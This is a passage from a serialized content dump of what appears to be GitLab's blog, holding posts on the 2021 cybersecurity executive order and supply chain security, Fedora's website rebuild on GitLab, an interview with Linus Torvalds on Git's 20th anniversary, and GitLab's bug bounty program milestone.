translations.\n",[9,267,1099],"features",{"slug":1101,"featured":6,"template":689},"behind-the-scenes-of-gitlab-korean-translation","content:en-us:blog:behind-the-scenes-of-gitlab-korean-translation.yml","Behind The Scenes Of Gitlab Korean Translation","en-us/blog/behind-the-scenes-of-gitlab-korean-translation.yml","en-us/blog/behind-the-scenes-of-gitlab-korean-translation",{"_path":1107,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1108,"content":1114,"config":1121,"_id":1123,"_type":14,"title":1124,"_source":16,"_file":1125,"_stem":1126,"_extension":19},"/en-us/blog/biden-administration-celebrates-1-year-anniversary-of-eo-by-accelerating-software-supply-chain-security",{"title":1109,"description":1110,"ogTitle":1109,"ogDescription":1110,"noIndex":6,"ogImage":1111,"ogUrl":1112,"ogSiteName":673,"ogType":674,"canonicalUrls":1112,"schema":1113},"Biden administration updates software supply chain security requirements","GitLab's One DevOps Platform can help agencies comply with government requirements.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667852/Blog/Hero%20Images/eosecurity.jpg","https://about.gitlab.com/blog/biden-administration-celebrates-1-year-anniversary-of-eo-by-accelerating-software-supply-chain-security","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Biden administration accelerates software supply chain security expectations a year into Executive Order\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sandra Gittlen\"}],\n        \"datePublished\": \"2022-05-12\",\n      }",{"title":1115,"description":1110,"authors":1116,"heroImage":1111,"date":1117,"body":1118,"category":1119,"tags":1120},"Biden administration accelerates software supply chain security expectations a year into Executive Order",[862],"2022-05-12","\n\nPresident Joe Biden last year on May 12th signed [Executive Order 14028 \"Improving the Nation’s Cybersecurity\"](https://www.whitehouse.gov/briefing-room/presidential-actions/2021/05/12/executive-order-on-improving-the-nations-cybersecurity/), which called on public and private sector organizations to improve the nation’s cybersecurity with “bold change” and “significant investments”. “Incremental improvements will not give us the security we need,” the EO states. Since then, the administration has only increased the pressure on agencies, forcing them to take a hard look at their software supply chains and justify their application development decisions, including how they use open source code, test their code, and grant permissions.\n\n“The federal government has accelerated its expectations for software supply chain security compliance, yet some organizations are still trying to understand how to broadly and proactively protect their software development,” says [Joel Krooswyk](https://gitlab.com/jkrooswyk), Senior Manager of Solutions Architecture at GitLab. “Agencies and their vendors have been focused on policy management and role-based access, but the federal government wants to go deeper and know where code is coming from and how to better secure it. They are quickly moving down the supply chain.” \n\nThe interest in the origins of software code stems from the complexity of cyberattacks such as that [carried out on SolarWinds](/blog/what-the-solarwinds-attack-can-teach-us-about-devsecops/), as well as the ongoing [log4j](/blog/use-gitlab-to-detect-vulnerabilities/) and Spring4Shell vulnerabilities. “Intentionally malicious contributions can inject code that is literally opening the doors to hackers,” Krooswyk says. “However, agencies and vendors can’t just stop utilizing open source software and microservices. They need the ingenuity of the open source community.” GitLab is a proponent of open source and believes [everyone can contribute](/company/mission/).\n\nThe Biden administration, through its frameworks and mandates, is simply saying, 'we have to keep a better eye on that,' especially as more organizations assume a cloud-first posture, according to Krooswyk.\n\nFor example, earlier this year, the National Institute of Standards and Technology (NIST) published the Software Security Development Framework (SSDF) 1.1, which offers guidance on how to [create tighter controls throughout the software development lifecycle](/blog/comply-with-nist-secure-supply-chain-framework-with-gitlab/).\n\nThe SSDF 1.1 framework recommends: \n- organizations should be prepared by reviewing permissions\n- all components of software should be safe from tampering and unauthorized access\n- software should be produced with minimal security vulnerabilities in its releases\n- organizations should be able to quickly and sufficiently respond to vulnerabilities \n\n## Code sourcing\n\nThe next phase in the federal government’s move to secure the software supply chain will be to [require reporting and/or attestation](/blog/securing-the-software-supply-chain-through-automated-attestation/).\n\n“Agencies and their vendors are being asked if their software is justifiably built using properly sourced code. As a result, organizations may have to explain why they chose to use code from non-mainline repositories,” Krooswyk says.\n\nFor instance, if a DevOps team chooses code from a non-mainline repository originating in China, they will have to attest to why they did that over sourcing from a mainline repository. The same idea applies to pulling clean containers and not repeatedly using those plagued with existing vulnerabilities, according to Krooswyk.\n\nHe believes these questions will all be rolled up into a Cybersecurity & Infrastructure Software Agency (CISA) mandate for a [software bill of materials](https://www.cisa.gov/sbom) (SBOM), which is a list of ingredients that make up software components. “The SBOM will show the list of contributors, known vulnerabilities, results of dependency scans on open source, and more,” he says. “The Biden administration, NIST, and CISA are all in alignment on the need for more consistent software security attestation.”\n\n## How to prepare\n\nWhile some agencies, like the U.S. Department of Defense, might be on the cutting edge of these mandates, smaller agencies or those with more legacy infrastructure and practices might require more effort to be able to comply. “If your development, operations, and security processes aren’t transparent or fully documented and if your scanning is still manual, then these new requirements could be a roadblock,” Krooswyk says. “The administration is only going broader in terms of the scope of mandates and more specific with security requirements as time progresses to plug all the security holes, meaning more regulations and further compliance.”\n\nGitLab believes some of the long-term asks expected to come from the government may include:\n- bake security in, don’t bolt it on\n- ensure scanning is top of mind\n- maintain zero-trust permission models and source code management controls\n- any open source software used should have known origins and support SBOM generation, verifiable by dependency scanning\n- purchase secure commercial off-the-shelf software that complies with all security and labeling requirements from standards bodies\n\nGitLab’s One DevOps Platform can help organizations answer this request for software supply chain security compliance through visibility and transparency into processes, verifiable compliance, zero-trust user management, and templated security automation. “While we are helping organizations with cloud adoption and infrastructure modernization, we’re doing so in such a way as to not compromise on risk or security, providing end-to-end traceability and step-by-step auditability from issue creation through deployment,” he says.\n\nGitLab has a distinct set of features that make enabling NIST frameworks and attesting to code sourcing decisions easier:\n- [SBOM creation](https://docs.gitlab.com/ee/user/application_security/dependency_list/#dependency-list) in a standardized format \n- [Security dashboards](https://docs.gitlab.com/ee/user/application_security/security_dashboard/)\n- [Vulnerability reports and remediation](https://docs.gitlab.com/ee/user/application_security/vulnerability_report/)\n- [Pipeline frameworks and compliance](https://docs.gitlab.com/ee/user/project/settings/#compliance-frameworks)\n- [Security scanning breadth of offering](https://docs.gitlab.com/ee/user/application_security/) from SAST and DAST to fuzz testing \n\nAs the EO states, incremental improvements are not enough to properly secure software. To meet the totality, speed, and sophistication of the administration’s demands for cybersecurity protections, consider adopting GitLab’s One DevOps Platform.\n\n","devsecops",[685,865,9],{"slug":1122,"featured":6,"template":689},"biden-administration-celebrates-1-year-anniversary-of-eo-by-accelerating-software-supply-chain-security","content:en-us:blog:biden-administration-celebrates-1-year-anniversary-of-eo-by-accelerating-software-supply-chain-security.yml","Biden Administration Celebrates 1 Year Anniversary Of Eo By Accelerating Software Supply Chain Security","en-us/blog/biden-administration-celebrates-1-year-anniversary-of-eo-by-accelerating-software-supply-chain-security.yml","en-us/blog/biden-administration-celebrates-1-year-anniversary-of-eo-by-accelerating-software-supply-chain-security",{"_path":1128,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1129,"content":1135,"config":1142,"_id":1144,"_type":14,"title":1145,"_source":16,"_file":1146,"_stem":1147,"_extension":19},"/en-us/blog/building-new-fedora-project-website-with-gitlab",{"title":1130,"description":1131,"ogTitle":1130,"ogDescription":1131,"noIndex":6,"ogImage":1132,"ogUrl":1133,"ogSiteName":673,"ogType":674,"canonicalUrls":1133,"schema":1134},"How GitLab helped Fedora build websites and community","Learn how the Fedora Project recently modernized its web development practices and streamlined team workflows with GitLab.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682851/Blog/Hero%20Images/communityhands.jpg","https://about.gitlab.com/blog/building-new-fedora-project-website-with-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How building modern websites with GitLab led to a healthier Fedora Project community\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Akashdeep Dhar\"}],\n        \"datePublished\": \"2023-07-11\",\n      }",{"title":1136,"description":1131,"authors":1137,"heroImage":1132,"date":1139,"body":1140,"category":10,"tags":1141},"How building modern websites with GitLab led to a healthier Fedora Project community",[1138],"Akashdeep Dhar","2023-07-11","\nWhen [Fedora Linux 38](https://fedoraproject.org/) debuted in April 2023, the Fedora Project community and I had an extra reason to celebrate. The first item in the community's [official release annoucement](https://fedoramagazine.org/announcing-fedora-38/) was one we were extremely proud of: our brand-new Fedora Project websites.\n\nThe launch of the new websites was the culmination of many months of good, old-fashioned community contribution from the \n[Fedora Websites and Apps team](https://gitlab.com/fedora/websites-apps) and other teams such as [Fedora Infrastructure](https://pagure.io/fedora-infrastructure), [Fedora Marketing](https://docs.fedoraproject.org/en-US/marketing/), \n[Fedora Design](https://fedoraproject.org/wiki/Design), and many more teams. This effort didn't just involve the development of the refreshed websites; it also involved rearchitecturing the team's technical stack and aligning our workflows with modern industry's best practices. \n\nIn this article, I will explain how migrating our workflow to GitLab helped us to not only build refreshed websites for the Fedora Project but also reimagine and streamline our community's process for building, maintaining, testing, and deploying them. The result: new workflows that redefine our team's processes to incentivize contribution and avoid the looming threat of potential contributor burnout – not to mention the elegant websites themselves.\n\n## Why we embarked on this effort\nAbout two years ago, four Fedora Project community members ([Ramya Parimi](https://gitlab.com/ramyaparimi), [Nasir Hussain](https://gitlab.com/nasirhm), [Justin W. Flory](https://gitlab.com/jwflory), and [myself](https://gitlab.com/t0xic0der)) were working on a project together when we discovered that only a tiny group of volunteer contributors maintained our websites. We immediately faced a dilemma that's common in many free and open source projects: Should that tiny group disband or disappear, we were at risk of not being able to maintain our websites and applications. Also, we didn't want the volunteer contributors to get burnt out under the constant stress of maintaining these projects. We needed more hands on deck, and we needed them quickly.\n\nSo our former Fedora Community Architect (the position was then called Fedora Community Action and Impact Coordinator, or FCAIC), [Marie Nordin](https://gitlab.com/riecatnor), helped us kickstart a community initiative that inspired us to not only refresh Fedora Project websites and applications but also establish more reliable processes and workflows around them, too.\n\nThat second part is incredibly important. We focused on enhancing the visual appeal and user experience of our websites — diligently adhering to the best accessibility practices, implementing a native dark mode that aligns with the user's system theme, and effectively advocating for our offerings to the best of our abilities (among other things). But we needed to solve the problem of maintainability, too. That would involve addressing some underlying issues that, although they looked deceptively simple on the surface, profoundly influenced the long-term sustainability of the team's work. Our goal was to ensure that even when *we* were not around, contributors who would do this work *after* us would be able to set things up and maintain them in the long run without issue.\n\nTo recruit more contributors, we needed to align the way our team worked with current industry practices. Adopting GitLab helped us do that.\n\n## How GitLab helped simplify, unify, and standardize\nHistorically, the website development team employed a range of tools as part of our workflows. Some we developed internally; others we acquired externally and integrated into our infrastructure. But these tools weren't always compatible with one another, meaning extra effort on our part (establishing a standardized business language for effective communication of work plans, progress obstacles, task updates, etc.). That not only impacted our operational efficiency but also drained our resources (for example, we were dedicating meetings solely to the purpose of ensuring everyone was aligned and understood the processes).\n\nAdopting GitLab helped alleviate that burden, because it's [a single, comprehensive platform](https://about.gitlab.com/stages-devops-lifecycle/). Our team got acclimated to capabilities like creating and tagging issues and epics to organize work, building Kanban boards and Gantt charts to map work-in-progress and construct functional timelines, and incorporating merge requests as progress indicators in a comprehensive project overview. We then understood how the cohesive nature of GitLab's approach to most aspects (if not all) of the software development lifecycle significantly enhanced our distributed team's overall efficiency.\n\nBut we use GitLab for more than just planning and implementation. We completely rewrote the technology stack using industry-standard static site-generating libraries like [NuxtJS](https://v2.nuxt.com/). GitLab's ability to create and deploy static sites helps us automate our deployment workflow. Then we coupled the revamped frontend with the [NetlifyCMS](https://v1.netlifycms.org/) content management system that relies on GitLab as its core. We also simplified the translation pipeline for localizing and internationalizing our website content. By employing continuous integration tools, we were able to generate dynamic test deployments to evaluate our websites before deploying them to the production environment. That success also prompted us to utilize GitLab for storing meeting logs and documentation, streamlining our project management processes even further.\n\nHere's an example.\n\nIn the past, when our websites were based on [Frozen Flask](https://pypi.org/project/Frozen-Flask/), we used various shell scripts to maintain it. These scripts would create an [OCI](https://opencontainers.org/) container using [Podman](https://podman.io/), build static files, perform translations, and serve the website. You can still find the [deprecated](https://pagure.io/fedora-websites) [repositories](https://pagure.io/fedora-web/websites/) where this was the standard development, testing, and deployment method. Although this process was automated using Ansible in our community infrastructure, it seemed complex for less experienced contributors.\n\nAfter transitioning to GitLab, we could deploy to our fast-changing staging environments directly from [GitLab Pages](https://docs.gitlab.com/ee/user/project/pages/) while the slow-changing production environment remained on the community infrastructure. We also utilized GitLab's CI/CD features to test merge requests with ephemeral deployment environments. Since the automation is integrated into the project itself, any push to the primary branch or merge request triggers a deployment workflow. This consolidation of automation into a single unit has further streamlined our processes.\n\n## Better workflow, healthier community\nChanges like these were critical to the Fedora Project's overall [mission to foster an inviting environment](https://docs.fedoraproject.org/en-US/project/#_our_community) for contributors. Our new GitLab-centric workflow improved the experience for team members who wanted to contribute to documenting and translating content without having to navigate the technical intricacies of using Git. By lowering the entry barrier, we aimed to attract prospective newcomers and promote a more inclusive team dynamic.\n\nAs a result, we saw content contributions from other teams. And then, gradually, more folks joined us in our revamp efforts, helping to [make this community initiative a success](https://communityblog.fedoraproject.org/tag/websites-and-apps-initiative-wrapup/).\n\n*The [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) are building the future of open source on GitLab. Connect with them on [Gitlab.com](https://gitlab.com/gitlab-com/marketing/community-relations/open-source-program/gitlab-open-source-partners).*\n\nPhoto by [Hannah Busing](https://unsplash.com/@hannahbusing?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on Unsplash.\n{: .note}\n\n\n",[9,267,1099],{"slug":1143,"featured":6,"template":689},"building-new-fedora-project-website-with-gitlab","content:en-us:blog:building-new-fedora-project-website-with-gitlab.yml","Building New Fedora Project Website With Gitlab","en-us/blog/building-new-fedora-project-website-with-gitlab.yml","en-us/blog/building-new-fedora-project-website-with-gitlab",{"_path":1149,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1150,"content":1156,"config":1161,"_id":1163,"_type":14,"title":1164,"_source":16,"_file":1165,"_stem":1166,"_extension":19},"/en-us/blog/celebrating-gits-20th-anniversary-with-creator-linus-torvalds",{"title":1151,"description":1152,"ogTitle":1151,"ogDescription":1152,"noIndex":6,"ogImage":1153,"ogUrl":1154,"ogSiteName":673,"ogType":674,"canonicalUrls":1154,"schema":1155},"Celebrating Git's 20th anniversary with creator Linus Torvalds","Discover the origins of the open-source version control system, why he handed over the reins a few months in, and what he thinks about adding new programming languages to Git.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749662510/Blog/Hero%20Images/git-20-years-opt1.png","https://about.gitlab.com/blog/celebrating-gits-20th-anniversary-with-creator-linus-torvalds","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Celebrating Git's 20th anniversary with creator Linus Torvalds\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Patrick Steinhardt\"}],\n        \"datePublished\": \"2025-04-07\",\n      }",{"title":1151,"description":1152,"authors":1157,"heroImage":1153,"date":1158,"body":1159,"category":10,"tags":1160},[747],"2025-04-07","The Git version control system was first released on April 7, 2005, by the father of the Linux kernel, Linus Torvalds. To mark the 20th anniversary of this important project that is nowadays used by almost every single developer, I interviewed Linus about the history of Git, why he handed over maintainership of Git, and what he considers to be its most important milestones.\n\n**In 2005, you were already the maintainer of the thriving Linux kernel. Why did you decide to start a new version control system?**\n\nSo, I got into it from really despising version control.\n\nI had used the traditional version control systems (CVS/RCS/SCCS) both as an end user (i.e., tracking open source projects like [GCC](https://gcc.gnu.org/)) and as a developer (we used CVS at Transmeta for everything) and absolutely hated the experience with a passion.\n\n\u003Cimg src=\"https://about.gitlab.com/images/blogimages/linustorvalds.png\" align=\"left\" width=\"200px\" style=\"padding-right: 20px; padding-bottom: 10px\"/>\n\nAnd yes, back then most projects that used CVS had probably moved to [SVN](https://subversion.apache.org/), but honestly, I always felt that SVN was just \"lipstick on a pig.\" It was just CVS in another form, with some UI improvements, but none of the fundamentals fixed, and a few new problems added.\n\nThe problems with CVS and its ilk are too many to even list, and, happily, they have largely become irrelevant and younger developers have probably never even had to deal with any of it. I absolutely refused to deal with it for the kernel, even though a few subsystems (notably the networking side) were actually using CVS to track their code back in the '90s.\n\nAnyway, back then I lived in the Bay Area, and Larry McVoy, who I knew from other projects (mainly [lmbench](https://www.usenix.org/legacy/publications/library/proceedings/sd96/full_papers/mcvoy.pdf)), had started BitMover, which had a new version control model called BitKeeper, or BK, for short.\n\nBK wasn't open source, but Larry liked open source projects and really felt that the lack of version control was holding the kernel back. He wasn't wrong, but the traditional source code managers (SCMs) really didn't work for me at all. Larry spent some time showing me and David Miller (networking maintainer and existing CVS user) what BitKeeper could do.\n\nBK wasn't perfect, and it was based on Source Code Control System (SCCS) like so many other traditional SCMs were, and thus had the same broken \"history per file\" model that everybody else had, and that causes huge and fundamental issues with file renaming and deletion.\n\nBut BK also wasn't just that \"lipstick\" thing. It may have used SCCS at a low level, but on a higher level it fixed some really fundamental things, and did proper distributed development, and had a real global – not per-file – history that made merging code from different trees actually work.\n\nWith CVS, creating branches and merging them was something you had to plan and discuss with people, and were major events. With BK, every repository was a branch. We take that for granted now, and Git obviously took it much further by having many branches *per* repository, but even the much more limited BK model was really a big deal at the time.\n\nAgain, BK wasn't perfect. As mentioned, it did do per-file history, which really is a big fundamental problem that makes renaming and file merging simply not work reliably, and inevitably causes chaos and pain (for CVS people, think Attic, shudder). And it had some scalability issues, too, but those took a while to become more than a bit problematic.\n\nBut the biggest problem with BK was the licensing, and while over the years (we used BK from 2002 to 2005) a lot of kernel maintainers did end up switching over to it, it was always a bit of a friction point. And that friction came to a head in late 2004, and the use of BK for the kernel basically became untenable a few months later.\n\nI was in the situation that for three years I'd finally used source control that worked, and it really had solved a lot of problems. There was no way I was going back to the days before source control, but in the years we'd been using BK, nothing better had really come out of the open source community.\n\nSure, people knew that CVS and SVN didn't work well, and there were projects that tried alternate approaches, but some of those approaches were even worse (basically amounting to \"fancy patch tracking\"), or had some good ideas but in the process making up some entirely new horrible design mistakes ([Monotone](https://www.monotone.ca/)).\n\nSo, I looked around for a while, and decided that I didn't have any options – I had to write my own.\n\nNow, technically, it actually did take only a few days to make the first version of Git, and hey, it's all there in the Git commit history. It's easy enough to see how it goes from pretty much zero to being usable enough that I started applying patches from others a week later (and being actively used for the kernel a few days after that).\n\nBut that ignores the fact that I had been *thinking* about the problem for a while by then. Writing code is easy. Getting a good design is what matters. So there was a fair amount of background to those few days that is pretty important, and that part doesn't show up in the history.\n\nAnd hey, that first version was very, very rough, and didn't do a lot that was to come later. But you can definitely already see much of the core design in those first few days.\n\n**Can you give us a short recount of the first days and weeks of how the Git project was started?**\n\nI had basically decided that I will stop kernel development until I had an alternative that worked for me. The main goals were to be distributed and high performance, and be something you could absolutely rely on to catch any corruption.\n\nBut I really do want to stress that I wasn't interested in SCMs, per se. I was interested in the end result, not in the process. So Git was never like the kernel for me: I do Linux because I think kernels are interesting - I did Git because I had to.\n\nWhich then directly segues into your next question.\n\n**You handed over the maintainership of Git to Junio Hamano after a couple of months, and Junio is still the maintainer. Why did you hand over maintainership and what made you pick Junio?**\n\nHanding over maintainership was not a hard choice. It was very much: \"The moment somebody else comes along that I can trust to keep it going, I'll go back to doing just the kernel.\"\n\nWhich is not to say that I just threw things over the wall and prayed for the best. I ended up maintaining Git for something like four months because I felt I needed to find somebody who would stick around, and had that hard-to-explain quality of \"GoodTaste\"(TM).\n\nJunio had been one of the very early people involved (he literally showed up the first week of development), but it's not like I just said, \"Tag, you're it.\"  It takes a while to see who sticks around, and who writes code and makes decisions that make sense.\n\nAnd I think Junio has been exemplary. I get much too much credit for the few months I spent on Git - particularly in light of the 20th anniversary. I'll take credit for getting the core design right, and getting the project started, but it really is Junio who has led the project (not to belittle the hundreds of other people involved, but still).\n\n**The initial version of the Mercurial version control system was released only 12 days after the initial version of Git, on April 19, 2005. Many people claim that Mercurial's user experience was superior over Git's, but nowadays Git is significantly more popular. Why do you think that Git has won over Mercurial?**\n\nOh, a big part of it is obviously just network effects, and SCMs have very strong network effects. It's why CVS survived as long as it did despite its limitations.\n\nSo, the fact that the kernel used Git (and then at some point it got to be very popular in the Ruby on Rails community, and then it took off everywhere).\n\nBut I really do think that the design of Git is superior. The core model is both very simple and very powerful, and I think that made it easier to translate into other environments. JGit was an early example of that, but you obviously have implementations like the MSgit virtual filesystem, etc.\n\nAnd while Git was famously somewhat hard to use early on, I really do think that some of that comes from having done things \"right,\" where people coming from other environments found Git non-intuitive because Git really did a few hard decisions that a traditional SCM person would never have done.\n\n**The Git project has not stood still since you handed maintainership over to Junio, and its community is always busy working on new features. What do you think the most important milestones were after you have left the project?**\n\nThat's really hard for me to say, mainly because I obviously made Git work for me, and so the things *I* use have worked from pretty much Day One. Just as an obvious example: Making Git work on Windows was obviously a huge step for other people, but it affected *me* not at all ;)\n\nThere's obviously all the infrastructure within Git itself to make it a lot easier to use, but I think most of the big milestones have all been around people taking the Git infrastructure and building things around it. Those often end up feeding back into Git features, of course, but, at the same time, the milestone is about something external.\n\nTo give an obvious example: All the big Git hosting sites were big milestones. Making Git be distributed was what made those so much easier to do, but the *milestone* was how then the hosting made it so easy for users to use Git for various projects.\n\n**If you had the capacity to work on Git full time again, would there be anything that you would like to implement?**\n\nAbsolutely not. Git did everything I really needed from very early on – my use is actually fairly limited, and I only really care about one project.\n\nAnd I say \"absolutely not\" because I refer you to that earlier answer: I was never really interested in SCMs at all to begin with. I think a large reason for why Git ended up being so different - mostly in good ways - from other SCMs was that I approached it more like I would a distributed journaling filesystem, not really a traditional SCM.\n\n**Is there any feature or design decision in Git that you have come to regret in retrospect?**\n\nDesign decisions? No. I still think the high-level design is just very good, and you can discuss various Git concepts without ever getting into the nitty-gritty complexity of actual implementation.\n\nAnd I think that's important in a project. You need a certain high-level design principle to guide the conceptual direction of a project.\n\nSometimes people take that too far, and think that the high-level design means that the implementation must then slavishly follow some core principle. And that's wrong, too – the *implementation* will have lots of nasty corner cases because reality is hard and people want odd things, but there needs to be some kind of top-level design that you can point to and reason about at a high level before you get your hands dirty with the nasty reality.\n\nAnd I think Git has a good balance of that. A very straightforward object store design (call them \"structured Merkle trees\" if you are a CS person, or you might just think of them as a \"content addressable storage\" if you are a filesystem person). That core design is there – but at the same time, it's realistically just a very tiny part of the actual code. Most of the *code* is about all the things you can do with the core design, but that basic clarity of design still gives the project some kind of high-level structure.\n\nIt's the same kind of high-level structure that Unix itself had, whether you said \"everything is a file\" or you were talking about process handling. There are a few \"concepts\" that drive the design, but then 99% of the code is about the ugly harsh details of what you build on top of that to make it all useful in the real world.\n\nI have two mantras in technology: \"If I have seen further, it is by standing on the shoulders of giants\" (Newton) and \"Genius is 1% inspiration and 99% perspiration\" (Edison).\n\nBut talking about the 99% perspiration: While I am very happy with the big design, there are certainly various details that I would have done differently if I were to do Git today.\n\nBut honestly, they aren't that important. What's much more important is all the *good* details that have been done over the last two decades.\n\n**The Linux kernel has started to use Rust as a programming language for some of its subsystems. Do you think it makes sense to start using such newer programming languages like this in Git?**\n\nI suspect that when it comes to Git, there's less reason to try to mix languages, which is always somewhat painful.\n\nIn the kernel, the end result is one single kernel binary – even if much of it can be loaded dynamically as modules, it is still linked together into effectively one single binary.\n\nAnd that makes using multiple languages more complex. But, on the other hand, the kernel also has more reason to worry about memory safety and, thus, look at newer languages.\n\nIn Git, if somebody wants to write parts of it in Rust or another language, I suspect it makes much more sense to just go for a separate implementation rather than try to mix languages in one binary.\n\nMuch of the Git core ideas are simple enough that just having parallel implementations of the core likely isn't too painful, and then you can target particular problem spaces where a different language makes more sense.\n\nAnd we've seen that in Git already, of course: That's exactly what JGit is. The use of a different language was due to a different web-based environment where that language choice was much more natural.\n\nI know that there are already Rust implementations of some of the core Git functionality, and I think the situation is similar: I suspect they make more sense in specific situations than in some kind of overall \"let's convert things to Rust\" kind of way.\n\nSo for anybody who is interested in implementing things in Rust, I'd suggest looking for target areas where the advantages of Rust are more obvious. I don't think C has actually been all that problematic in the standard Git source base.\n\n**New version control systems are popping up every couple of years. Do you think that Git will stay relevant in the future?**\n\nI already mentioned the network effects in SCMs, and I think that means that to replace Git you have to be not just slightly better, you have to be enormously better. Or so compatible that you effectively are just a new implementation of Git.\n\nAnd I do think the SCM situation has changed – Git doesn't have the kinds of huge gaping fundamental problems that SCMs had before Git. So being \"enormously better\" is fairly hard.\n\nSo, yes, I would expect Git to stay relevant for the foreseeable future, with people working on improvements *around* Git rather than replacements.\n\n*Note: This interview has been edited for length and clarity.*\n\n> Take a [journey with us through Git's 20-year history](https://about.gitlab.com/blog/journey-through-gits-20-year-history/).\n\n## Learn more about Git\n\n- [What's new in Git 2.49.0?](https://about.gitlab.com/blog/whats-new-in-git-2-49-0/)  \n- [What’s new in Git 2.48.0?](https://about.gitlab.com/blog/whats-new-in-git-2-48-0/)  \n- [A beginner's guide to the Git reftable format](https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format/)\n- [Git project](https://git-scm.com/)",[9,751],{"slug":1162,"featured":91,"template":689},"celebrating-gits-20th-anniversary-with-creator-linus-torvalds","content:en-us:blog:celebrating-gits-20th-anniversary-with-creator-linus-torvalds.yml","Celebrating Gits 20th Anniversary With Creator Linus Torvalds","en-us/blog/celebrating-gits-20th-anniversary-with-creator-linus-torvalds.yml","en-us/blog/celebrating-gits-20th-anniversary-with-creator-linus-torvalds",{"_path":1168,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1169,"content":1175,"config":1181,"_id":1183,"_type":14,"title":1184,"_source":16,"_file":1185,"_stem":1186,"_extension":19},"/en-us/blog/celebrating-one-million-bug-bounties-paid",{"title":1170,"description":1171,"ogTitle":1170,"ogDescription":1171,"noIndex":6,"ogImage":1172,"ogUrl":1173,"ogSiteName":673,"ogType":674,"canonicalUrls":1173,"schema":1174},"Celebrating a million dollars in bounties paid","Our bug bounty program has grown, expanded and matured in the past 5 years. A lot can happen in a million dollars’ time.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680992/Blog/Hero%20Images/silhouette-of-crowd-people-1486628.jpg","https://about.gitlab.com/blog/celebrating-one-million-bug-bounties-paid","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Celebrating a million dollars in bounties paid\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Heather Simpson\"}],\n        \"datePublished\": \"2020-01-14\",\n      }",{"title":1170,"description":1171,"authors":1176,"heroImage":1172,"date":1178,"body":1179,"category":865,"tags":1180},[1177],"Heather Simpson","2020-01-14","\n\nWhat started as a small, public vulnerability disclosure program awarding swag on qualified reports has grown into a thriving public bug bounty program that’s just paid out its millionth dollar in bounties and has seen contributions from hundreds of security researchers.   \n\nBut it's about much more than a million dollars in bounty payments. Our journey to this point has been an iterative one, gaining strength and improving along the way as we grow, learn and receive feedback from the security research community. We believe our journey models our commitment to building a strong and secure product for our customers but also our dedication to the open source and security community; one where everyone can contribute and also reap the rewards.  \n\n### Swags to riches  \n\nKnowing we needed to walk before we could run, the swag-awarding public vulnerability disclosure program we’d opened in 2014 quickly moved to a private, paid bounty program including a small pool of researchers, many of whom gained access through the previous vulnerability disclosure program. As we grew our security and appsec team and seasoned our processes around how we prioritize reports and how we collaborate internally to define and implement fixes, we quickly understood we’d want an open, public program where an entire community of security researchers could contribute. With the help of HackerOne, we built and [launched our public bug bounty program in December 2018](/blog/gitlab-hackerone-bug-bounty-program-is-public-today/). We’re excited to have just celebrated our one year anniversary as a public program in December 2019.  \n\n### So, what does a million dollars in bug bounties look like?  \n\n• Our appsec team has worked with 768 different researchers since our PVD launched in 2014, including several of HackerOne’s all-time leading reporters. \n\n• We’ve resolved 479 reports and made 400 of those reports public.  \n\n• 227 security researchers submitted multiple reports, meaning their first engagement with us was a positive one.    \n  \n[Transparency is key to security](/handbook/security/#security-vision) at GitLab. Transparency is also one of our core values and it's very important to our bug bounty program. You can see from our [disclosure policy](https://hackerone.com/gitlab) that resolved reports are made public via issues on GitLab.com 30 days after releasing a fix. There are certain reports, however, that we cannot disclose due to sensitive information, either at the request of the reporter or to protect a customer.    \n\nBeing transparent about our security issues allows customers to see the importance we place on securing our product. There are security issues in every tool and application out there – that’s a given. By disclosing full vulnerability information after 30 days, we give customers the time and information to understand the vulnerabilities that have been found and fixed, and to determine any potential impact in their environment. Being transparent about our environment helps us to grow and strengthen the trust customers place in us. Also publicly disclosing valid bugs reduces the threshold to contribute and helps security reporters build upon previous findings, which ultimately makes our product and customers more secure.  \n\n[Iteration](https://handbook.gitlab.com/handbook/values/#iteration) is one of GitLab’s core values. And our bug bounty program is no different. In the time since launching our public program at the end of 2018, we’ve taken feedback from our security research community and [reduced the time to bounty payout](/blog/reducing-time-to-payout-and-launching-a-bug-bounty-anniversary-contest/), moving part of the payout to the moment a report is triaged (on average, 5 days after the report is submitted), with the remainder of the payment happening once the report is resolved. Another improvement that’s been especially popular has been our decision to increase bounties for [critical and high severity reports](/blog/were-increasing-bounties-in-our-bug-bounty-program/). But, we know it's not all about bounties and payouts. Other less exciting, but key, foundational components of our program like [triage, response and overall communications](/blog/what-we-learned-by-taking-our-bug-bounty-program-public/) stay top of mind to ensure we’re keeping hackers engaged.   \n\n### And, what does the next million dollars in bounties paid hold? \n\nWe were proud to see the results of our most recent [bug bounty contest](/blog/bugs-bounties-and-cherry-browns/) (held October 1-November 30, 2019) include 279 reports from 123 different individuals (89 of them coming from new reporters!). We aim to keep reporters incentivized, motivated, and engaged to find bugs on our platform. Our public bug bounty program is as important to the security of our product and company as any other program we run within our Security Team here at GitLab, so we will continue to look at how we can strengthen and improve our processes and program, but also invite the feedback of our security research community for changes and updates they’d like to see.  \n\nThank you to the security research community for your expertise, your innovative findings and techniques, and for making our product stronger and more secure!  \n\nHappy Hacking!   \n\n\nPhoto by [Joey Theswampboi](https://www.pexels.com/@joey-theswampboi-442839) on [Pexels](https://pexels.com/)\n{: 